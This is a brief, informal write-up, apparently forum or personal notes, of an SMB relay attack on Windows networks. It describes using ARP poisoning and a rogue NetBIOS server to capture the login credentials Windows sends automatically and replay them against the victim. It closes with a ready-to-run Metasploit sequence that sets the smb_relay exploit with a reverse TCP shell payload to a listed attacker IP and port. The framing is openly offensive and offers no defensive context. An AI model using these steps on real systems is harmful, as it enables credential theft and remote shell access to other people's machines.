* it uses windows netbios
* I setup a netbios server nmbd
* then I poison the ARP or how ever can get you to load anything from \\MYEVILSERVER
* then you try to netbios to my evil server and I say NO auth denied ! then BY DEFUALT windows say OK LET ME TRY MY LOGIN AND PASSWORD
* you record what the remote mashine trys to login as then connect right back to the server using its own auth info it just gave you 
* OWNED

use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.146.129
set LPORT 12334
exploit